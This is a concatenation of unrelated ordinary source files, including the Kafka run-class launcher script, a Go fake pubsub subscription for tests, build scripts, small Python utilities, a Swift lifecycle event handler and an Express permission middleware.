    """Return True when the two values compare equal, False otherwise.

    Args:
        num1: first value to compare.
        num2: second value to compare.

    Returns:
        bool: result of the equality comparison.
    """
    # Idiom fix: return the comparison directly instead of if/else returning
    # literals. bool() keeps the original contract of always yielding a real
    # bool even for operands whose __eq__ returns a truthy non-bool object.
    return bool(num1 == num2)
|
<reponame>LuckyChen73/WYNewsClassNine<filename>WYNewsClassNine/WYNewsClassNine/Classes/Home/ChannelView/WYChannelController.h
//
// WYChannelController.h
// WYNewsClassNine
//
// Created by chenWei on 2017/3/18.
// Copyright © 2017年 陈伟. All rights reserved.
//
#import <UIKit/UIKit.h>
// Controller for the channel view of the Home module (see Classes/Home/
// ChannelView); declares no public API beyond the stock UIViewController.
@interface WYChannelController : UIViewController

@end
|
import os
class COSWrapper:
    """Thin wrapper around Cloud Object Storage (COS) bucket operations.

    The method bodies below are stubs (``pass``); the comments describe the
    intended behavior only.
    """

    def __init__(self, access_key_id, secret_access_key):
        # Credentials used to authenticate against the object storage service.
        self.access_key_id = access_key_id
        self.secret_access_key = secret_access_key
        # Additional initialization code for COS wrapper

    def upload_file(self, file_path, bucket_name):
        # Implementation for uploading a file to the specified bucket
        pass

    def download_file(self, file_name, bucket_name):
        # Implementation for downloading a file from the specified bucket
        pass

    def list_files(self, bucket_name):
        # Implementation for listing all files in the specified bucket
        pass
class COSWrapperError(Exception):
    # Error type caught around COSWrapper usage (see monitor_training_run);
    # lets callers distinguish COS failures from other exceptions.
    pass
def monitor_training_run(cmd_parameters):
    """Set up a COS handle for the 'package' command when a training id is given.

    Args:
        cmd_parameters: dict-like command options; reads 'command' (required
            key) and 'training_id' (optional).
    """
    cw = None  # COS wrapper handle
    training_guid = cmd_parameters.get('training_id', None)
    # Only the 'package' command with a known training run needs COS access.
    if cmd_parameters['command'] == 'package' and training_guid is not None:
        try:
            # Instantiate Cloud Object Storage wrapper
            # NOTE(review): os.environ[...] raises KeyError when the AWS
            # credential variables are unset, and that is NOT caught here —
            # confirm callers guarantee these variables exist.
            cw = COSWrapper(os.environ['AWS_ACCESS_KEY_ID'], os.environ['AWS_SECRET_ACCESS_KEY'])
            # Additional code for monitoring training run status and skipping preparation steps
        except COSWrapperError as cwe:
            # Handle COSWrapperError
            pass
// Align bytecode unit test
//
// Copyright (C) 2008 <NAME>
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions
// are met:
// 1. Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// 2. Redistributions in binary form must reproduce the above copyright
// notice, this list of conditions and the following disclaimer in the
// documentation and/or other materials provided with the distribution.
//
// THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND OTHER CONTRIBUTORS ``AS IS''
// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
// ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR OTHER CONTRIBUTORS BE
// LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
// SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
// INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
// CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//
#include <gtest/gtest.h>
#include "yasmx/BytecodeContainer.h"
#include "yasmx/Bytecode.h"
#include "yasmx/Expr.h"
#include "yasmx/IntNum.h"
// Appending an align bytecode should yield a bytecode that has contents,
// is marked SPECIAL_OFFSET, carries the given source location, and holds
// no fixed data.
TEST(AlignTest, Append)
{
    yasm::BytecodeContainer container(0);
    // Align to a 4-byte boundary; fill/maxskip left empty, no code fill,
    // and a dummy source location (raw encoding 5) to verify propagation.
    yasm::AppendAlign(container,
                      yasm::Expr(4),
                      yasm::Expr(),     // fill
                      yasm::Expr(),     // maxskip
                      0,                // code fill
                      yasm::SourceLocation::getFromRawEncoding(5));
    yasm::Bytecode& align = container.bytecodes_front();
    // align always results in contents
    EXPECT_TRUE(align.hasContents());
    EXPECT_EQ(yasm::Bytecode::Contents::SPECIAL_OFFSET,
              align.getSpecial());
    EXPECT_EQ(5U, align.getSource().getRawEncoding());
    EXPECT_TRUE(align.getFixed().empty());
}
|
#!/bin/bash
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Require at least the classname argument; everything else is optional.
if [ $# -lt 1 ];
then
  echo "USAGE: $0 [-daemon] [-name servicename] [-loggc] classname [opts]"
  exit 1
fi

# CYGWIN == 1 if Cygwin is detected, else 0.
if [[ $(uname -a) =~ "CYGWIN" ]]; then
  CYGWIN=1
else
  CYGWIN=0
fi

# Test jars are excluded from the classpath unless explicitly requested.
if [ -z "$INCLUDE_TEST_JARS" ]; then
  INCLUDE_TEST_JARS=false
fi
# Exclude jars not necessary for running commands.
regex="(-(test|test-sources|src|scaladoc|javadoc)\.jar|jar.asc)$"

# should_include_file <jar-path>
# Succeeds (0) when the jar belongs on the runtime classpath; fails (1) for
# test/source/doc artifacts — unless INCLUDE_TEST_JARS=true, which includes
# everything.
should_include_file() {
  [ "$INCLUDE_TEST_JARS" = true ] && return 0
  file=$1
  if echo "$file" | egrep -q "$regex"; then
    return 1
  fi
  return 0
}
base_dir=$(dirname $0)/..

# Resolve the Scala version: the environment variable wins, then
# gradle.properties, then the hard-coded default.
if [ -z "$SCALA_VERSION" ]; then
  SCALA_VERSION=2.13.5
  if [[ -f "$base_dir/gradle.properties" ]]; then
    SCALA_VERSION=`grep "^scalaVersion=" "$base_dir/gradle.properties" | cut -d= -f 2`
  fi
fi

# Binary version is the first two segments, e.g. 2.13.5 -> 2.13.
if [ -z "$SCALA_BINARY_VERSION" ]; then
  SCALA_BINARY_VERSION=$(echo $SCALA_VERSION | cut -f 1-2 -d '.')
fi

# run ./gradlew copyDependantLibs to get all dependant jars in a local dir
shopt -s nullglob
if [ -z "$UPGRADE_KAFKA_STREAMS_TEST_VERSION" ]; then
  for dir in "$base_dir"/core/build/dependant-libs-${SCALA_VERSION}*;
  do
    CLASSPATH="$CLASSPATH:$dir/*"
  done
fi

for file in "$base_dir"/examples/build/libs/kafka-examples*.jar;
do
  if should_include_file "$file"; then
    CLASSPATH="$CLASSPATH":"$file"
  fi
done

# For streams upgrade tests, use the pre-installed Kafka release's jars
# instead of the local build outputs.
if [ -z "$UPGRADE_KAFKA_STREAMS_TEST_VERSION" ]; then
  clients_lib_dir=$(dirname $0)/../clients/build/libs
  streams_lib_dir=$(dirname $0)/../streams/build/libs
  streams_dependant_clients_lib_dir=$(dirname $0)/../streams/build/dependant-libs-${SCALA_VERSION}
else
  clients_lib_dir=/opt/kafka-$UPGRADE_KAFKA_STREAMS_TEST_VERSION/libs
  streams_lib_dir=$clients_lib_dir
  streams_dependant_clients_lib_dir=$streams_lib_dir
fi
# Client and streams jars from the lib dirs chosen above.
for file in "$clients_lib_dir"/kafka-clients*.jar;
do
  if should_include_file "$file"; then
    CLASSPATH="$CLASSPATH":"$file"
  fi
done

for file in "$streams_lib_dir"/kafka-streams*.jar;
do
  if should_include_file "$file"; then
    CLASSPATH="$CLASSPATH":"$file"
  fi
done

if [ -z "$UPGRADE_KAFKA_STREAMS_TEST_VERSION" ]; then
  for file in "$base_dir"/streams/examples/build/libs/kafka-streams-examples*.jar;
  do
    if should_include_file "$file"; then
      CLASSPATH="$CLASSPATH":"$file"
    fi
  done
else
  # e.g. 2.8.1 -> 281 -> 28 (major+minor select the upgrade test module)
  VERSION_NO_DOTS=`echo $UPGRADE_KAFKA_STREAMS_TEST_VERSION | sed 's/\.//g'`
  SHORT_VERSION_NO_DOTS=${VERSION_NO_DOTS:0:((${#VERSION_NO_DOTS} - 1))} # remove last char, ie, bug-fix number
  for file in "$base_dir"/streams/upgrade-system-tests-$SHORT_VERSION_NO_DOTS/build/libs/kafka-streams-upgrade-system-tests*.jar;
  do
    if should_include_file "$file"; then
      CLASSPATH="$file":"$CLASSPATH"
    fi
  done
  # Old 0.10.x releases additionally need the ZooKeeper client jars.
  if [ "$SHORT_VERSION_NO_DOTS" = "0100" ]; then
    CLASSPATH="/opt/kafka-$UPGRADE_KAFKA_STREAMS_TEST_VERSION/libs/zkclient-0.8.jar":"$CLASSPATH"
    CLASSPATH="/opt/kafka-$UPGRADE_KAFKA_STREAMS_TEST_VERSION/libs/zookeeper-3.4.6.jar":"$CLASSPATH"
  fi
  if [ "$SHORT_VERSION_NO_DOTS" = "0101" ]; then
    CLASSPATH="/opt/kafka-$UPGRADE_KAFKA_STREAMS_TEST_VERSION/libs/zkclient-0.9.jar":"$CLASSPATH"
    CLASSPATH="/opt/kafka-$UPGRADE_KAFKA_STREAMS_TEST_VERSION/libs/zookeeper-3.4.8.jar":"$CLASSPATH"
  fi
fi

for file in "$streams_dependant_clients_lib_dir"/rocksdb*.jar;
do
  CLASSPATH="$CLASSPATH":"$file"
done

for file in "$streams_dependant_clients_lib_dir"/*hamcrest*.jar;
do
  CLASSPATH="$CLASSPATH":"$file"
done

for file in "$base_dir"/shell/build/libs/kafka-shell*.jar;
do
  if should_include_file "$file"; then
    CLASSPATH="$CLASSPATH":"$file"
  fi
done

for dir in "$base_dir"/shell/build/dependant-libs-${SCALA_VERSION}*;
do
  CLASSPATH="$CLASSPATH:$dir/*"
done

for file in "$base_dir"/tools/build/libs/kafka-tools*.jar;
do
  if should_include_file "$file"; then
    CLASSPATH="$CLASSPATH":"$file"
  fi
done

for dir in "$base_dir"/tools/build/dependant-libs-${SCALA_VERSION}*;
do
  CLASSPATH="$CLASSPATH:$dir/*"
done

# Connect modules: each package contributes its jar plus its dependant libs.
for cc_pkg in "api" "transforms" "runtime" "file" "mirror" "mirror-client" "json" "tools" "basic-auth-extension"
do
  for file in "$base_dir"/connect/${cc_pkg}/build/libs/connect-${cc_pkg}*.jar;
  do
    if should_include_file "$file"; then
      CLASSPATH="$CLASSPATH":"$file"
    fi
  done
  if [ -d "$base_dir/connect/${cc_pkg}/build/dependant-libs" ] ; then
    CLASSPATH="$CLASSPATH:$base_dir/connect/${cc_pkg}/build/dependant-libs/*"
  fi
done

# classpath addition for release
for file in "$base_dir"/libs/*;
do
  if should_include_file "$file"; then
    CLASSPATH="$CLASSPATH":"$file"
  fi
done

for file in "$base_dir"/core/build/libs/kafka_${SCALA_BINARY_VERSION}*.jar;
do
  if should_include_file "$file"; then
    CLASSPATH="$CLASSPATH":"$file"
  fi
done
shopt -u nullglob

if [ -z "$CLASSPATH" ] ; then
  echo "Classpath is empty. Please build the project first e.g. by running './gradlew jar -PscalaVersion=$SCALA_VERSION'"
  exit 1
fi
# JMX settings
if [ -z "$KAFKA_JMX_OPTS" ]; then
  KAFKA_JMX_OPTS="-Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false "
fi

# JMX port to use
# (unquoted test: true when JMX_PORT is set to a non-empty value)
if [ $JMX_PORT ]; then
  KAFKA_JMX_OPTS="$KAFKA_JMX_OPTS -Dcom.sun.management.jmxremote.port=$JMX_PORT "
fi

# Log directory to use
if [ "x$LOG_DIR" = "x" ]; then
  LOG_DIR="$base_dir/logs"
fi

# Log4j settings
if [ -z "$KAFKA_LOG4J_OPTS" ]; then
  # Log to console. This is a tool.
  LOG4J_DIR="$base_dir/config/tools-log4j.properties"
  # If Cygwin is detected, LOG4J_DIR is converted to Windows format.
  (( CYGWIN )) && LOG4J_DIR=$(cygpath --path --mixed "${LOG4J_DIR}")
  KAFKA_LOG4J_OPTS="-Dlog4j.configuration=file:${LOG4J_DIR}"
else
  # create logs directory
  if [ ! -d "$LOG_DIR" ]; then
    mkdir -p "$LOG_DIR"
  fi
fi

# If Cygwin is detected, LOG_DIR is converted to Windows format.
(( CYGWIN )) && LOG_DIR=$(cygpath --path --mixed "${LOG_DIR}")
KAFKA_LOG4J_OPTS="-Dkafka.logs.dir=$LOG_DIR $KAFKA_LOG4J_OPTS"

# Generic jvm settings you want to add
if [ -z "$KAFKA_OPTS" ]; then
  KAFKA_OPTS=""
fi

# Set Debug options if enabled
if [ "x$KAFKA_DEBUG" != "x" ]; then

  # Use default ports
  DEFAULT_JAVA_DEBUG_PORT="5005"

  if [ -z "$JAVA_DEBUG_PORT" ]; then
    JAVA_DEBUG_PORT="$DEFAULT_JAVA_DEBUG_PORT"
  fi

  # Use the defaults if JAVA_DEBUG_OPTS was not set
  DEFAULT_JAVA_DEBUG_OPTS="-agentlib:jdwp=transport=dt_socket,server=y,suspend=${DEBUG_SUSPEND_FLAG:-n},address=$JAVA_DEBUG_PORT"
  if [ -z "$JAVA_DEBUG_OPTS" ]; then
    JAVA_DEBUG_OPTS="$DEFAULT_JAVA_DEBUG_OPTS"
  fi

  echo "Enabling Java debug options: $JAVA_DEBUG_OPTS"
  KAFKA_OPTS="$JAVA_DEBUG_OPTS $KAFKA_OPTS"
fi

# Which java to use
if [ -z "$JAVA_HOME" ]; then
  JAVA="java"
else
  JAVA="$JAVA_HOME/bin/java"
fi

# Memory options
if [ -z "$KAFKA_HEAP_OPTS" ]; then
  KAFKA_HEAP_OPTS="-Xmx256M"
fi

# JVM performance options
# MaxInlineLevel=15 is the default since JDK 14 and can be removed once older JDKs are no longer supported
if [ -z "$KAFKA_JVM_PERFORMANCE_OPTS" ]; then
  KAFKA_JVM_PERFORMANCE_OPTS="-server -XX:+UseG1GC -XX:MaxGCPauseMillis=20 -XX:InitiatingHeapOccupancyPercent=35 -XX:+ExplicitGCInvokesConcurrent -XX:MaxInlineLevel=15 -Djava.awt.headless=true"
fi
# Consume launcher flags (-name/-loggc/-daemon) up to the first non-flag,
# which is the class name handed to java via "$@".
while [ $# -gt 0 ]; do
  COMMAND=$1
  case $COMMAND in
    -name)
      DAEMON_NAME=$2
      CONSOLE_OUTPUT_FILE=$LOG_DIR/$DAEMON_NAME.out
      shift 2
      ;;
    -loggc)
      if [ -z "$KAFKA_GC_LOG_OPTS" ]; then
        GC_LOG_ENABLED="true"
      fi
      shift
      ;;
    -daemon)
      DAEMON_MODE="true"
      shift
      ;;
    *)
      break
      ;;
  esac
done

# GC options
GC_FILE_SUFFIX='-gc.log'
GC_LOG_FILE_NAME=''
if [ "x$GC_LOG_ENABLED" = "xtrue" ]; then
  GC_LOG_FILE_NAME=$DAEMON_NAME$GC_FILE_SUFFIX

  # The first segment of the version number, which is '1' for releases before Java 9
  # it then becomes '9', '10', ...
  # Some examples of the first line of `java --version`:
  # 8 -> java version "1.8.0_152"
  # 9.0.4 -> java version "9.0.4"
  # 10 -> java version "10" 2018-03-20
  # 10.0.1 -> java version "10.0.1" 2018-04-17
  # We need to match to the end of the line to prevent sed from printing the characters that do not match
  JAVA_MAJOR_VERSION=$("$JAVA" -version 2>&1 | sed -E -n 's/.* version "([0-9]*).*$/\1/p')
  if [[ "$JAVA_MAJOR_VERSION" -ge "9" ]] ; then
    # JDK 9+ unified logging replaces the old -Xloggc/-XX:+PrintGC* flags.
    KAFKA_GC_LOG_OPTS="-Xlog:gc*:file=$LOG_DIR/$GC_LOG_FILE_NAME:time,tags:filecount=10,filesize=100M"
  else
    KAFKA_GC_LOG_OPTS="-Xloggc:$LOG_DIR/$GC_LOG_FILE_NAME -verbose:gc -XX:+PrintGCDetails -XX:+PrintGCDateStamps -XX:+PrintGCTimeStamps -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=10 -XX:GCLogFileSize=100M"
  fi
fi

# Remove a possible colon prefix from the classpath (happens at lines like `CLASSPATH="$CLASSPATH:$file"` when CLASSPATH is blank)
# Syntax used on the right side is native Bash string manipulation; for more details see
# http://tldp.org/LDP/abs/html/string-manipulation.html, specifically the section titled "Substring Removal"
CLASSPATH=${CLASSPATH#:}

# If Cygwin is detected, classpath is converted to Windows format.
(( CYGWIN )) && CLASSPATH=$(cygpath --path --mixed "${CLASSPATH}")

# Launch mode
# Daemon mode detaches fully: nohup, output to the console file, stdin from
# /dev/null; otherwise exec replaces this shell with the JVM.
if [ "x$DAEMON_MODE" = "xtrue" ]; then
  nohup "$JAVA" $KAFKA_HEAP_OPTS $KAFKA_JVM_PERFORMANCE_OPTS $KAFKA_GC_LOG_OPTS $KAFKA_JMX_OPTS $KAFKA_LOG4J_OPTS -cp "$CLASSPATH" $KAFKA_OPTS "$@" > "$CONSOLE_OUTPUT_FILE" 2>&1 < /dev/null &
else
  exec "$JAVA" $KAFKA_HEAP_OPTS $KAFKA_JVM_PERFORMANCE_OPTS $KAFKA_GC_LOG_OPTS $KAFKA_JMX_OPTS $KAFKA_LOG4J_OPTS -cp "$CLASSPATH" $KAFKA_OPTS "$@"
fi
|
# Rake tasks for managing the Cequel (Cassandra) schema in a Rails app.
namespace :cequel do
namespace :keyspace do
desc 'Initialize Cassandra keyspace'
task :create => :environment do
Cequel::Record.connection.schema.create!
puts "Created keyspace #{Cequel::Record.connection.name}"
end
desc 'Drop Cassandra keyspace'
task :drop => :environment do
Cequel::Record.connection.schema.drop!
puts "Dropped keyspace #{Cequel::Record.connection.name}"
end
end
desc "Synchronize all models defined in `app/models' with Cassandra database schema"
task :migrate => :environment do
# WatchStack records constants defined while requiring each model file, so we
# only consider classes actually declared under app/models.
watch_stack = ActiveSupport::Dependencies::WatchStack.new
Dir.glob(Rails.root.join('app', 'models', '**', '*.rb')).each do |file|
watch_stack.watch_namespaces([Object])
require_dependency(file)
watch_stack.new_constants.each do |class_name|
clazz = class_name.constantize
# Only Cequel::Record models have a Cassandra-backed schema to sync.
if clazz.ancestors.include?(Cequel::Record)
clazz.synchronize_schema
puts "Synchronized schema for #{class_name}"
end
end
end
end
desc "Create keyspace and tables for all defined models"
task :init => %w(keyspace:create migrate)
end
|
/**
* Created by rkapoor on 01/06/15.
*/
'use strict';
module.exports = function uglify(grunt) {
// Load task
grunt.loadNpmTasks('grunt-contrib-uglify');
// Options
return {
travelPage : {
src: 'public/js/production/travelPage.js',
dest: 'public/js/production/travelPage.min.js'
},
homePage : {
src : 'public/js/production/homePage.js',
dest : 'public/js/production/homePage.min.js'
},
hotelsAndPlacesPage : {
src : 'public/js/production/hotelsAndPlacesPage.js',
dest : 'public/js/production/hotelsAndPlacesPage.min.js'
}
};
};
|
def validate_specimen_definition(specimen_definition):
    """
    Validate a specimen-definition mapping.

    Required fields: id, type, container, additive — all must be strings.

    Args:
        specimen_definition: dict describing a specimen.

    Returns:
        The same specimen_definition, unchanged, when valid.

    Raises:
        ValueError: if a required field is missing or has the wrong type.
    """
    # Field name -> required type. The keys double as the required-field list,
    # removing the original's separate (and duplicated) ``fields`` list.
    field_types = {
        "id": str,
        "type": str,
        "container": str,
        "additive": str,
    }
    # Missing fields are reported before type errors, matching the original
    # two-pass precedence.
    for field in field_types:
        if field not in specimen_definition:
            raise ValueError(f"Missing field: {field}")
    # All fields are present at this point, so no membership re-check is needed.
    for field, expected_type in field_types.items():
        if not isinstance(specimen_definition[field], expected_type):
            raise ValueError(f"Invalid data type for field {field}: expected {expected_type.__name__}")
    return specimen_definition
#!/bin/bash
# Cross-compile the ucspm binary for all supported OS/arch targets.
# Binaries are written to ./bin/.
#
# Abort on the first failed build (the original continued past failures,
# silently producing an incomplete bin/ directory).
set -euo pipefail

# build <label> <GOOS> <GOARCH> <output-name>
# Prints the same progress message as the original script, then compiles.
build() {
  echo "Building $1"
  env GOOS="$2" GOARCH="$3" go build -a -o "bin/$4"
}

build "Linux x86"     linux   386   ucspm-linux-x86
build "Linux amd64"   linux   amd64 ucspm-linux-amd64
build "Mac amd64"     darwin  amd64 ucspm-mac
build "Solaris amd64" solaris amd64 ucspm-solaris
build "Windows x86"   windows 386   ucspm-windows-x86
build "Windows amd64" windows amd64 ucspm-windows-amd64
echo "Building complete"

# Other GOOS/GOARCH pairs supported by the Go toolchain, kept for reference:
# android arm
# darwin 386
# darwin amd64
# darwin arm
# darwin arm64
# dragonfly amd64
# freebsd 386
# freebsd amd64
# freebsd arm
# linux 386
# linux amd64
# linux arm
# linux arm64
# linux ppc64
# linux ppc64le
# linux mips
# linux mipsle
# linux mips64
# linux mips64le
# netbsd 386
# netbsd amd64
# netbsd arm
# openbsd 386
# openbsd amd64
# openbsd arm
# plan9 386
# plan9 amd64
# solaris amd64
# windows 386
# windows amd64
import math
def calculate_adjusted_distance(coordinates):
    """
    Generator yielding the "adjusted distance" for each consecutive pair of
    coordinates: the 3-D Euclidean distance between the pair, offset by the
    z-value (height) of the first point of the pair.

    Args:
        coordinates: A sequence of (x, y, z) tuples.

    Yields:
        float: distance(coordinates[i], coordinates[i+1]) + coordinates[i][2]
        for each i in range(len(coordinates) - 1).
    """
    def distance(coord1, coord2):
        # Standard 3-D Euclidean distance.
        return math.sqrt((coord2[0] - coord1[0])**2 + (coord2[1] - coord1[1])**2 + (coord2[2] - coord1[2])**2)
    # The original computed the maximum z value ("zsTop") here but never used
    # it; the dead computation has been removed.
    for i in range(len(coordinates) - 1):
        yield distance(coordinates[i], coordinates[i + 1]) + coordinates[i][2]
'use strict'
const util = require('util')
// Promisified child_process.exec so we can await shell commands.
const exec = util.promisify(require('child_process').exec)
const scan = require('scan-dir-recursive/sync')
// Test bootstrap: resets the database, then requires every source file so
// coverage tooling sees all modules even if no test touches them.
module.exports.start = async () => {
// Purge data
await exec('npm run ddb:purge')
// Include all files for full coverage
scan(`${__dirname}/../src`).filter(file => file.endsWith('.js')).forEach(file => require(file))
}
|
<filename>net/pubsub/testing.go<gh_stars>0
package pubsub
import (
"context"
"sync"
"gx/ipfs/QmTu65MVbemtUxJEWgsTtzv9Zv9P8rvmqNA4eG9TrTRGYc/go-libp2p-peer"
)
// FakeMessage is a simple pubsub message
// used by tests as an in-memory stand-in for a real network message.
type FakeMessage struct {
peerID peer.ID
data []byte
}
// GetFrom returns the message's sender ID
func (m *FakeMessage) GetFrom() peer.ID {
return m.peerID
}
// GetData returns the message's payload
func (m *FakeMessage) GetData() []byte {
return m.data
}
// FakeSubscription is a fake pubsub subscription.
type FakeSubscription struct {
topic string
// pending buffers posted messages until Next consumes them.
pending chan Message
// err, once set via Fail, is returned by every subsequent Next call.
err error
cancelled bool
// awaitCancel is released by Cancel; see AwaitCancellation.
awaitCancel sync.WaitGroup
}
// NewFakeSubscription builds a new fake subscription to a topic.
// bufSize bounds how many messages Post can buffer before blocking.
func NewFakeSubscription(topic string, bufSize int) *FakeSubscription {
sub := &FakeSubscription{
topic: topic,
pending: make(chan Message, bufSize),
awaitCancel: sync.WaitGroup{},
}
// One unit of work: "waiting to be cancelled"; Done is called in Cancel.
sub.awaitCancel.Add(1)
return sub
}
// Subscription interface
// Topic returns this subscription's topic.
func (s *FakeSubscription) Topic() string {
return s.topic
}
// Next returns the next messages from this subscription.
// It returns the stored error (if Fail was called), otherwise blocks until a
// message is posted or the context is done.
func (s *FakeSubscription) Next(ctx context.Context) (Message, error) {
if s.err != nil {
return nil, s.err
}
select {
case msg := <-s.pending:
return msg, nil
case <-ctx.Done():
return nil, ctx.Err()
}
}
// Cancel cancels this subscription, after which no subsequently posted messages will be received.
// Calling Cancel twice panics (the WaitGroup would go negative anyway).
func (s *FakeSubscription) Cancel() {
if s.cancelled {
panic("subscription already cancelled")
}
s.cancelled = true
// Release anyone blocked in AwaitCancellation.
s.awaitCancel.Done()
}
// Manipulators
// Post posts a new message to this subscription.
// Panics if the subscription has already been failed; messages posted after
// cancellation are silently dropped.
// NOTE(review): fields are accessed without synchronization — assumes test
// code posts/fails/cancels from a single goroutine; confirm before reuse.
func (s *FakeSubscription) Post(msg Message) {
if s.err != nil {
panic("subscription has failed")
}
if !s.cancelled {
s.pending <- msg
}
}
// Fail causes subsequent reads from this subscription to fail.
// Panics when err is nil: failing with a nil error would make Next return
// (nil, nil) and silently hide the failure.
// (The original guard was inverted — `if err != nil` panicked with
// "error is nil" on every valid call.)
func (s *FakeSubscription) Fail(err error) {
	if err == nil {
		panic("error is nil")
	}
	if !s.cancelled {
		s.err = err
	}
}
// AwaitCancellation waits for the subscription to be canceled by the subscriber.
// Blocks until Cancel releases the WaitGroup armed in NewFakeSubscription.
func (s *FakeSubscription) AwaitCancellation() {
s.awaitCancel.Wait()
}
|
<filename>src/index.js
// Package entry point: expose the Input component as the default export.
import ThesaurusInput from './components/Input.jsx';
export default ThesaurusInput;
#!/bin/sh
#
# Vivado(TM)
# runme.sh: a Vivado-generated Runs Script for UNIX
# Copyright 1986-2015 Xilinx, Inc. All Rights Reserved.
#
# Prepend (or set) the Xilinx tool directories on PATH.
if [ -z "$PATH" ]; then
PATH=/home/huchao/vivado/SDK/2015.2/bin:/home/huchao/vivado/Vivado/2015.2/ids_lite/ISE/bin/lin64:/home/huchao/vivado/Vivado/2015.2/bin
else
PATH=/home/huchao/vivado/SDK/2015.2/bin:/home/huchao/vivado/Vivado/2015.2/ids_lite/ISE/bin/lin64:/home/huchao/vivado/Vivado/2015.2/bin:$PATH
fi
export PATH
# Same for the ISE shared libraries on LD_LIBRARY_PATH.
if [ -z "$LD_LIBRARY_PATH" ]; then
LD_LIBRARY_PATH=/home/huchao/vivado/Vivado/2015.2/ids_lite/ISE/lib/lin64
else
LD_LIBRARY_PATH=/home/huchao/vivado/Vivado/2015.2/ids_lite/ISE/lib/lin64:$LD_LIBRARY_PATH
fi
export LD_LIBRARY_PATH
# Run from the directory containing this script; all step output goes to runme.log.
HD_PWD=`dirname "$0"`
cd "$HD_PWD"
HD_LOG=runme.log
/bin/touch $HD_LOG
# ISEWrap.sh wraps each flow step and records status into the log.
ISEStep="./ISEWrap.sh"
# EAStep: run one flow step through the ISEWrap helper, appending all output
# to $HD_LOG. Aborts the whole script if the step fails.
EAStep()
{
$ISEStep $HD_LOG "$@" >> $HD_LOG 2>&1
RETVAL=$?
if [ $RETVAL -ne 0 ]
then
# Propagate the step's exit status. The original used a bare "exit" here,
# which returns the status of the preceding [ test (0) and masked failures.
exit $RETVAL
fi
}
# Run the batch-mode Vivado flow driven by lab1_3_2.tcl (logged to lab1_3_2.vds).
EAStep vivado -log lab1_3_2.vds -m64 -mode batch -messageDb vivado.pb -notrace -source lab1_3_2.tcl
|
# for vast
# Setup for a vast.ai instance: disable auto-tmux, strip the PS1 override
# from .bashrc, then launch the DeepPavlov REST API.
touch .no_auto_tmux
# drop last line with PS1 (backup kept as .bashrc.back)
mv .bashrc .bashrc.back
# grep reads the backup directly; the original piped it through cat needlessly.
grep -vE '^PS1' .bashrc.back > .bashrc
# Serve the Russian BERT NER model over HTTP.
python -m deeppavlov.deep riseapi ner_rus_bert
|
/// Dispatches application lifecycle events to registered handler closures.
class ApplicationEventHandler {
    /// Registered handlers, keyed by event name. Registering the same name
    /// twice replaces the previous handler.
    var eventHandlers: [String: () -> Void] = [:]

    // The handleX convenience methods forward to triggerEvent; the original
    // duplicated the dictionary-lookup logic in each of them.

    /// Fires the "applicationWillResignActive" handler, if registered.
    func handleResignActive() {
        triggerEvent(eventName: "applicationWillResignActive")
    }

    /// Fires the "applicationDidEnterBackground" handler, if registered.
    func handleEnterBackground() {
        triggerEvent(eventName: "applicationDidEnterBackground")
    }

    /// Fires the "applicationWillEnterForeground" handler, if registered.
    func handleEnterForeground() {
        triggerEvent(eventName: "applicationWillEnterForeground")
    }

    /// Registers (or replaces) the handler for the given event name.
    func registerEvent(eventName: String, handler: @escaping () -> Void) {
        eventHandlers[eventName] = handler
    }

    /// Invokes the handler for the given event name; no-op when none is registered.
    func triggerEvent(eventName: String) {
        if let handler = eventHandlers[eventName] {
            handler()
        }
    }
}
// Sample usage
// Registers a handler for each standard lifecycle event, then triggers each
// one to demonstrate dispatch. Expected output: three "Handling ..." lines.
let eventHandler = ApplicationEventHandler()
eventHandler.registerEvent(eventName: "applicationWillResignActive") {
print("Handling applicationWillResignActive event")
}
eventHandler.registerEvent(eventName: "applicationDidEnterBackground") {
print("Handling applicationDidEnterBackground event")
}
eventHandler.registerEvent(eventName: "applicationWillEnterForeground") {
print("Handling applicationWillEnterForeground event")
}
eventHandler.triggerEvent(eventName: "applicationWillResignActive")
eventHandler.triggerEvent(eventName: "applicationDidEnterBackground")
eventHandler.triggerEvent(eventName: "applicationWillEnterForeground")
'use strict';
const MissingPermission = require('../missing-permission');
const { ADMIN } = require('../permissions');
module.exports = function(config, permission) {
if (!permission || !config.extendedPermissions) {
return (req, res, next) => next();
}
return (req, res, next) => {
if (
req.user &&
req.user.permissions &&
(req.user.permissions.indexOf(ADMIN) !== -1 ||
req.user.permissions.indexOf(permission) !== -1)
) {
return next();
}
return res
.status(403)
.json(
new MissingPermission({
permission,
message: `You require ${permission} to perform this action`,
})
)
.end();
};
};
|
# -*- coding: utf-8 -*-
miquire :core, "event"
# An object that listens for occurrences of an Event.
class EventListener
# Stop executing any further plugin callbacks.
# The thrown :plugin_exit is caught by the plugin dispatch loop.
def self.cancel!
throw :plugin_exit, false end
# ==== Args
# [event] the Event instance to observe
